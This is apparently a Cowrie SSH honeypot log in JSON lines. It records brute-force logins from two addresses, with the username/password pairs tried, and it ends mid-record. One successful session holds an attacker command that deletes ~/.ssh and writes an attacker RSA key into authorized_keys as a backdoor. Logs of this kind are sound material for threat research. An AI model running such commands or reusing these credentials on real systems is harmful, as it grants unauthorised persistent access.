{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:05.351911Z","src_ip":"212.227.125.160","session":"97a65f2ddb7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:05.403835Z","src_ip":"212.227.125.160","session":"97a65f2ddb7a"}
{"eventid":"cowrie.login.failed","username":"server","password":"123456","message":"login attempt [server/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:05.650543Z","src_ip":"212.227.125.160","session":"97a65f2ddb7a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:06.785511Z","src_ip":"212.227.125.160","session":"97a65f2ddb7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34566,"dst_ip":"1.2.3.4","dst_port":22,"session":"a377c1cf516e","protocol":"ssh","message":"New connection: 212.227.125.160:34566 (1.2.3.4:22) [session: a377c1cf516e]","sensor":"my-vps","timestamp":"2025-08-26T21:51:11.282184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:11.307032Z","src_ip":"212.227.125.160","session":"a377c1cf516e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:11.352330Z","src_ip":"212.227.125.160","session":"a377c1cf516e"}
{"eventid":"cowrie.login.failed","username":"lvuser","password":"lvuser","message":"login attempt [lvuser/lvuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:11.609350Z","src_ip":"212.227.125.160","session":"a377c1cf516e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:12.657417Z","src_ip":"212.227.125.160","session":"a377c1cf516e"}
{"eventid":"cowrie.session.connect","src_ip":"210.114.22.126","src_port":34072,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c8650b26cbe","protocol":"ssh","message":"New connection: 210.114.22.126:34072 (1.2.3.4:22) [session: 5c8650b26cbe]","sensor":"my-vps","timestamp":"2025-08-26T21:51:12.840511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-26T21:51:12.841291Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-26T21:51:13.148553Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.login.success","username":"root","password":"Linux@2025","message":"login attempt [root/Linux@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:51:14.344769Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:51:15.019722Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T21:51:15.020410Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T21:51:15.021746Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:15.747050Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:51:16.076812Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T21:51:16.077539Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T21:51:16.458187Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:16.459164Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.session.connect","src_ip":"210.114.22.126","src_port":34820,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d6b713c4e40","protocol":"ssh","message":"New connection: 210.114.22.126:34820 (1.2.3.4:22) [session: 8d6b713c4e40]","sensor":"my-vps","timestamp":"2025-08-26T21:51:16.749898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-26T21:51:16.751102Z","src_ip":"210.114.22.126","session":"8d6b713c4e40"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-26T21:51:17.156445Z","src_ip":"210.114.22.126","session":"8d6b713c4e40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58182,"dst_ip":"1.2.3.4","dst_port":22,"session":"983d254ae03e","protocol":"ssh","message":"New connection: 212.227.125.160:58182 (1.2.3.4:22) [session: 983d254ae03e]","sensor":"my-vps","timestamp":"2025-08-26T21:51:17.205283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:17.224321Z","src_ip":"212.227.125.160","session":"983d254ae03e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:17.257185Z","src_ip":"212.227.125.160","session":"983d254ae03e"}
{"eventid":"cowrie.login.failed","username":"jfedu1","password":"123456","message":"login attempt [jfedu1/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:17.461546Z","src_ip":"212.227.125.160","session":"983d254ae03e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:18.454796Z","src_ip":"210.114.22.126","session":"8d6b713c4e40"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:18.527785Z","src_ip":"212.227.125.160","session":"983d254ae03e"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:19.857851Z","src_ip":"210.114.22.126","session":"8d6b713c4e40"}
{"eventid":"cowrie.session.connect","src_ip":"210.114.22.126","src_port":35430,"dst_ip":"1.2.3.4","dst_port":22,"session":"84e445f905fd","protocol":"ssh","message":"New connection: 210.114.22.126:35430 (1.2.3.4:22) [session: 84e445f905fd]","sensor":"my-vps","timestamp":"2025-08-26T21:51:20.160145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-26T21:51:20.160884Z","src_ip":"210.114.22.126","session":"84e445f905fd"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-26T21:51:20.473199Z","src_ip":"210.114.22.126","session":"84e445f905fd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:51:21.868590Z","src_ip":"210.114.22.126","session":"84e445f905fd"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:22.166141Z","src_ip":"210.114.22.126","session":"5c8650b26cbe"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:22.167139Z","src_ip":"210.114.22.126","session":"84e445f905fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53568,"dst_ip":"1.2.3.4","dst_port":22,"session":"3946c9a36427","protocol":"ssh","message":"New connection: 212.227.125.160:53568 (1.2.3.4:22) [session: 3946c9a36427]","sensor":"my-vps","timestamp":"2025-08-26T21:51:22.648280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:22.695186Z","src_ip":"212.227.125.160","session":"3946c9a36427"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:22.737416Z","src_ip":"212.227.125.160","session":"3946c9a36427"}
{"eventid":"cowrie.login.failed","username":"stream","password":"stream","message":"login attempt [stream/stream] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:23.321105Z","src_ip":"212.227.125.160","session":"3946c9a36427"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:24.378617Z","src_ip":"212.227.125.160","session":"3946c9a36427"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48954,"dst_ip":"1.2.3.4","dst_port":22,"session":"72d7b22cac58","protocol":"ssh","message":"New connection: 212.227.125.160:48954 (1.2.3.4:22) [session: 72d7b22cac58]","sensor":"my-vps","timestamp":"2025-08-26T21:51:28.338697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:28.339380Z","src_ip":"212.227.125.160","session":"72d7b22cac58"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:51:28.732134Z","src_ip":"212.227.125.160","session":"72d7b22cac58"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:51:28.938360Z","src_ip":"212.227.125.160","session":"72d7b22cac58"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:51:30.094609Z","src_ip":"212.227.125.160","session":"72d7b22cac58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44344,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4d076e3f21","protocol":"ssh","message":"New connection: 212.227.125.160:44344 (1.2.3.4:22) [session: ef4d076e3f21]","sensor":"my-vps","timestamp":"2025-08-26T21:51:34.122838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:51:34.124005Z","src_ip":"212.227.125.160","session":"ef4d076e3f21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh